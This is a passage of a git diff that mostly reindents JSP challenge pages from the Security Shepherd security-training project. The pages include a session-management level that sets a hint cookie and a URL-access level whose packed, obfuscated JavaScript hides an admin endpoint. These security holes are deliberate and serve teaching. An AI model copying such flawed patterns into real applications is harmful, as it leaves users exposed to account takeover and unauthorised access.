-        var thePineappleAmount = $("#numberOfPineapples").val();
-        var theOrangeAmount = $("#numberOfOranges").val();
-        var theAppleAmount = $("#numberOfApples").val();
-        var theBananaAmount = $("#numberOfBananas").val();
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    pineappleAmount: thePineappleAmount,
-                    orangeAmount: theOrangeAmount,
-                    appleAmount: theAppleAmount,
-                    bananaAmount: theBananaAmount
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+	$("#leForm").submit(function(){
+		var thePineappleAmount = $("#numberOfPineapples").val();
+		var theOrangeAmount = $("#numberOfOranges").val();
+		var theAppleAmount = $("#numberOfApples").val();
+		var theBananaAmount = $("#numberOfBananas").val();
+		$("#submitButton").hide("fast");
+		$("#loadingSign").show("slow");
+		$("#resultsDiv").hide("slow", function(){
+			var ajaxCall = $.ajax({
+				type: "POST",
+				url: "<%= levelHash %>",
+				data: {
+					pineappleAmount: thePineappleAmount, 
+					orangeAmount: theOrangeAmount,
+					appleAmount: theAppleAmount, 
+					bananaAmount: theBananaAmount
+				},
+				async: false
+			});
+			if(ajaxCall.status == 200)
+			{
+				$("#resultsDiv").html(ajaxCall.responseText);
+			}
+			else
+			{
+				$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+			}
+			$("#resultsDiv").show("slow", function(){
+				$("#loadingSign").hide("fast", function(){
+					$("#submitButton").show("slow");
+				});
+			});
+		});
+	});
 
-</script>
-<%
-    if (Analytics.googleAnalyticsOn) {
-%><%=Analytics.googleAnalyticsScript%>
-<%
-    }
-%>
+	</script>
+	<%
+		if (Analytics.googleAnalyticsOn) {
+	%><%=Analytics.googleAnalyticsScript%>
+	<%
+		}
+	%>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	} else {
+			response.sendRedirect("../loggedOutSheep.html");
+		}
+	} else {
+		response.sendRedirect("../loggedOutSheep.html");
+	}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80.jsp b/src/main/webapp/challenges/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80.jsp
index f823c890a..c6c8889b3 100644
--- a/src/main/webapp/challenges/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80.jsp
+++ b/src/main/webapp/challenges/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80.jsp
@@ -1,253 +1,261 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    // Broken Authentication and Session Management Challenge 7
+// Broken Authentication and Session Management Challenge 7
 
 /**
  * <br/><br/>
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
  *
  * @author Mark Denihan
  */
 
-    String levelName = "Session Management Challenge 7";
-    String levelHash = "269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80";
+String levelName = "Session Management Challenge 7";
+String levelHash = "269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.sessionManagement." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.sessionManagement." + levelHash, locale);
 //Used more than once translations
-    String i18nLevelName = bundle.getString("challenge.challengeName");
+String i18nLevelName = bundle.getString("challenge.challengeName");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-        <br/>
-    <form id="leForm" action="javascript:;">
-        <div id="resultsDiv">
-            <table>
-                <tr>
-                    <td><%= bundle.getString("challenge.form.userName") %>
-                    </td>
-                    <td><input type="text" id="subName" autocomplete="off"/></td>
-                </tr>
-                <tr>
-                    <td><%= bundle.getString("challenge.form.password") %>
-                    </td>
-                    <td><input type="password" id="subPassword"/></td>
-                </tr>
-                <tr>
-                    <td colspan="2">
-                        <div id="submitButton">
-                            <input type="submit"
-                                   value="<%= bundle.getString("challenge.form.signIn") %>"/>
-                        </div>
-                    </td>
-                </tr>
-            </table>
-        </div>
-        <small><a id="forgottenPasswordLink" href="#"><%= bundle.getString("challenge.form.forgotPassword") %>
-        </a></small>
-    </form>
-    <p style="display: none;" id="loadingSign"><%= bundle.getString("challenge.form.loading") %>
-    </p>
-    <br/>
-    <div id="forgottenPassDiv" style="display: none;">
-        <form id="leForm2" action="javascript:;">
-            <h2 class='title'><%= bundle.getString("question.header") %>
-            </h2>
-            <p>
-                <%= bundle.getString("question.whatToDo") %>
-            </p>
-            <table>
-                <tr>
-                    </td>
-                    <div id="resetSubmit">
-                        <input id="resetEmail" type="text" width="300px"
-                               autocomplete="off"/><input type="submit"
-                                                          value="<%= bundle.getString("question.form.getQuestion") %>"/>
-                    </div>
-                    <p style="display: none;" id="resetLoadingSign"><%= bundle.getString("challenge.form.loading") %>
-                    </p>
-                    </td>
-                </tr>
-            </table>
-        </form>
-        <div id="resultsDiv2"></div>
-        <div id="answerQuestionDiv" style="display: none;">
-            <form id="leForm3" action="javascript:;">
-                <table>
-                    <tr>
-                        </td>
-                        <div id="answerQuestion">
-                            <input id="questionAnswer" type="text" width="300px"
-                                   autocomplete="off"/><input type="submit"
-                                                              value="<%= bundle.getString("question.form.giveAnswer") %>"/>
-                        </div>
-                        <p style="display: none;"
-                           id="answerLoadingSign"><%= bundle.getString("challenge.form.loading") %>
-                        </p>
-                        </td>
-                    </tr>
-                </table>
-            </form>
-        </div>
-        <div id="resultsDiv3"></div>
-    </div>
-
-
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        var theSubName = $("#subName").val();
-        var theSubPassword = $("#subPassword").val();
-        $("#loadingSign").show("slow");
-        $("#forgottenPassDiv").hide("slow");
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    subName: theSubName,
-                    subPassword: theSubPassword
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#loadingSign").hide("fast", function () {
-                $("#resultsDiv").show("slow");
-            });
-        });
-    });
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+			<br />
+		<form id="leForm" action="javascript:;">
+			<div id="resultsDiv">
+				<table>
+					<tr>
+						<td><%= bundle.getString("challenge.form.userName") %></td>
+						<td><input type="text" id="subName" autocomplete="off" /></td>
+					</tr>
+					<tr>
+						<td><%= bundle.getString("challenge.form.password") %></td>
+						<td><input type="password" id="subPassword" /></td>
+					</tr>
+					<tr>
+						<td colspan="2">
+							<div id="submitButton">
+								<input type="submit"
+									value="<%= bundle.getString("challenge.form.signIn") %>" />
+							</div>
+						</td>
+					</tr>
+				</table>
+			</div>
+			<small><a id="forgottenPasswordLink" href="#"><%= bundle.getString("challenge.form.forgotPassword") %></a></small>
+		</form>
+		<p style="display: none;" id="loadingSign"><%= bundle.getString("challenge.form.loading") %></p>
+		<br />
+		<div id="forgottenPassDiv" style="display: none;">
+			<form id="leForm2" action="javascript:;">
+				<h2 class='title'><%= bundle.getString("question.header") %></h2>
+				<p>
+					<%= bundle.getString("question.whatToDo") %>
+				</p>
+				<table>
+					<tr>
+						</td>
+						<div id="resetSubmit">
+							<input id="resetEmail" type="text" width="300px"
+								autocomplete="off" /><input type="submit"
+								value="<%= bundle.getString("question.form.getQuestion") %>" />
+						</div>
+						<p style="display: none;" id="resetLoadingSign"><%= bundle.getString("challenge.form.loading") %></p>
+						</td>
+					</tr>
+				</table>
+			</form>
+			<div id="resultsDiv2"></div>
+			<div id="answerQuestionDiv" style="display: none;">
+				<form id="leForm3" action="javascript:;">
+					<table>
+						<tr>
+							</td>
+							<div id="answerQuestion">
+								<input id="questionAnswer" type="text" width="300px"
+									autocomplete="off" /><input type="submit"
+									value="<%= bundle.getString("question.form.giveAnswer") %>" />
+							</div>
+							<p style="display: none;" id="answerLoadingSign"><%= bundle.getString("challenge.form.loading") %></p>
+							</td>
+						</tr>
+					</table>
+				</form>
+			</div>
+			<div id="resultsDiv3"></div>
+		</div>
 
-    $("#leForm2").submit(function () {
-        var theResetEmail = $("#resetEmail").val();
-        $("#resetSubmit").hide("fast");
-        $("#resetLoadingSign").show("slow");
-        $("#resultsDiv2").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "GET",
-                url: "<%= levelHash %>SecretQuestion",
-                data: {
-                    subEmail: theResetEmail
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv2").html("<p>" + ajaxCall.responseText + "</p>");
-            } else {
-                $("#resultsDiv2").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv2").show("slow", function () {
-                $("#resetLoadingSign").hide("fast", function () {
-                    $("#resetSubmit").show("slow");
-                    $("#answerQuestionDiv").show("slow");
-                });
-            });
-        });
-    });
 
-    $("#leForm3").submit(function () {
-        var theResetEmail = $("#resetEmail").val();
-        var theAnswer = $("#questionAnswer").val();
-        $("#answerQuestion").hide("fast");
-        $("#answerLoadingSign").show("slow");
-        $("#resultsDiv3").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>SecretQuestion",
-                data: {
-                    subEmail: theResetEmail,
-                    subAnswer: theAnswer
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv3").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv3").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv3").show("slow", function () {
-                $("#answerLoadingSign").hide("fast", function () {
-                    $("#answerQuestion").show("slow");
-                });
-            });
-        });
-    });
-
-
-    $("#forgottenPasswordLink").click(function () {
-        $("#forgottenPassDiv").toggle("slow", function () {
-            //Animation Complete
-            ;
-        });
-    });
-
-    //<%= bundle.getString("clue.1") %>
-    document.cookie = "ac=ZG9Ob3RSZXR1cm5BbnN3ZXJz";
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				var theSubName = $("#subName").val();
+				var theSubPassword = $("#subPassword").val();
+				$("#loadingSign").show("slow");
+				$("#forgottenPassDiv").hide("slow");
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							subName: theSubName,
+							subPassword: theSubPassword
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#loadingSign").hide("fast", function(){
+						$("#resultsDiv").show("slow");
+					});
+				});
+			});
+			
+			$("#leForm2").submit(function(){
+				var theResetEmail = $("#resetEmail").val();
+				$("#resetSubmit").hide("fast");
+				$("#resetLoadingSign").show("slow");
+				$("#resultsDiv2").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "GET",
+						url: "<%= levelHash %>SecretQuestion",
+						data: {
+							subEmail: theResetEmail
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv2").html("<p>" + ajaxCall.responseText + "</p>");
+					}
+					else
+					{
+						$("#resultsDiv2").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv2").show("slow", function(){
+						$("#resetLoadingSign").hide("fast", function(){
+							$("#resetSubmit").show("slow");
+							$("#answerQuestionDiv").show("slow");
+						});
+					});
+				});
+			});
+			
+			$("#leForm3").submit(function(){
+				var theResetEmail = $("#resetEmail").val();
+				var theAnswer = $("#questionAnswer").val();
+				$("#answerQuestion").hide("fast");
+				$("#answerLoadingSign").show("slow");
+				$("#resultsDiv3").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>SecretQuestion",
+						data: {
+							subEmail: theResetEmail,
+							subAnswer: theAnswer
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv3").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv3").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv3").show("slow", function(){
+						$("#answerLoadingSign").hide("fast", function(){
+							$("#answerQuestion").show("slow");
+						});
+					});
+				});
+			});
+			
+			
+			$("#forgottenPasswordLink").click(function(){
+				$("#forgottenPassDiv").toggle("slow", function(){
+					//Animation Complete
+					;
+				});
+			});
+			
+			//<%= bundle.getString("clue.1") %>
+			document.cookie="ac=ZG9Ob3RSZXR1cm5BbnN3ZXJz";
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa.jsp b/src/main/webapp/challenges/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa.jsp
index 809e15ffa..e5e49491e 100644
--- a/src/main/webapp/challenges/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa.jsp
+++ b/src/main/webapp/challenges/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa.jsp
@@ -1,134 +1,117 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
 
-    /**
-     * This level has obfusticated javascript that describes admin funcitons that fail to restrict URL access
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+/**
+ * This level has obfusticated javascript that describes admin funcitons that fail to restrict URL access
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
 //No Quotes In level Name
-    String levelName = "Failure to Restrict URL Access Challenge 2";
+String levelName = "Failure to Restrict URL Access Challenge 2";
 //Alphanumeric Only
-    String levelHash = "278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa";
+String levelHash = "278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.urlAccess." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.urlAccess." + levelHash, locale);
 //Used more than once translations
-    String translatedLevelName = bundle.getString("challenge.challengeName");
+String translatedLevelName = bundle.getString("challenge.challengeName");
 
 //Logs the IP, Forwarded IP that acceeded this level with the level name in the debug for convience. If you want to log more stuff in the JSP use this as an example
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-        <br/> <br/>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("challenge.form.getInfo") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>
-                    </p>
-                    <div style="display: none;" id="hintButton">
-                        <input type="button" value="<%= bundle.getString("sign.hint") %>"
-                               id="theHintButton"/>
-                    </div>
-                </td>
-            </tr>
-        </table>
-    </form>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+			<br /> <br />
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("challenge.form.getInfo") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %></p>
+						<div style="display: none;" id="hintButton">
+							<input type="button" value="<%= bundle.getString("sign.hint") %>"
+								id="theHintButton" />
+						</div>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    eval(function (p, a, c, k, e, d) {
-        e = function (c) {
-            return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
-        };
-        if (!''.replace(/^/, String)) {
-            while (c--) {
-                d[e(c)] = k[c] || e(c)
-            }
-            k = [function (e) {
-                return d[e]
-            }];
-            e = function () {
-                return '\\w+'
-            };
-            c = 1
-        }
-        ;
-        while (c--) {
-            if (k[c]) {
-                p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
-            }
-        }
-        return p
-    }('$("#A").f(3(){$("#8").5("9");$("#7").4("1");$("#2").5("1",3(){e 0=$.h({i:"j",b:"v",c:{u:"t",},d:g});m(0.6==k){$("#2").a(0.s)}q{$("#2").a("<p> l r n: "+0.6+" "+0.o+"</p>")}$("#2").4("1",3(){$("#7").5("9",3(){$("#8").4("1")})})})});$("#w").f(3(){$("#8").5("9");$("#7").4("1");$("#2").5("1",3(){e 0=$.h({i:"j",b:"x",c:{y:"z",},d:g});m(0.6==k){$("#2").a(0.s)}q{$("#2").a("<p> l r n: "+0.6+" "+0.o+"</p>")}$("#2").4("1",3(){$("#7").5("9",3(){$("#8").4("1")})})})});', 37, 37, 'ajaxCall|slow|resultsDiv|function|show|hide|status|loadingSign|submitButton|fast|html|url|data|async|var|submit|false|ajax|type|POST|200|An|if|Occurred|statusText||else|Error|responseText|sOdjh318UD8ismcoa98smcj21dmdoaoIS9|guestData|278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa|leAdministratorFormOfAwesomeness|278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fahghghmin|adminData|youAreAnAdminOfAwesomenessWoopWoop|leForm'.split('|'), 0, {}))
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('$("#A").f(3(){$("#8").5("9");$("#7").4("1");$("#2").5("1",3(){e 0=$.h({i:"j",b:"v",c:{u:"t",},d:g});m(0.6==k){$("#2").a(0.s)}q{$("#2").a("<p> l r n: "+0.6+" "+0.o+"</p>")}$("#2").4("1",3(){$("#7").5("9",3(){$("#8").4("1")})})})});$("#w").f(3(){$("#8").5("9");$("#7").4("1");$("#2").5("1",3(){e 0=$.h({i:"j",b:"x",c:{y:"z",},d:g});m(0.6==k){$("#2").a(0.s)}q{$("#2").a("<p> l r n: "+0.6+" "+0.o+"</p>")}$("#2").4("1",3(){$("#7").5("9",3(){$("#8").4("1")})})})});',37,37,'ajaxCall|slow|resultsDiv|function|show|hide|status|loadingSign|submitButton|fast|html|url|data|async|var|submit|false|ajax|type|POST|200|An|if|Occurred|statusText||else|Error|responseText|sOdjh318UD8ismcoa98smcj21dmdoaoIS9|guestData|278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa|leAdministratorFormOfAwesomeness|278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fahghghmin|adminData|youAreAnAdminOfAwesomenessWoopWoop|leForm'.split('|'),0,{}))
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 	
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/2da053b4afb1530a500120a49a14d422ea56705a7e3fc405a77bc269948ccae1.jsp b/src/main/webapp/challenges/2da053b4afb1530a500120a49a14d422ea56705a7e3fc405a77bc269948ccae1.jsp
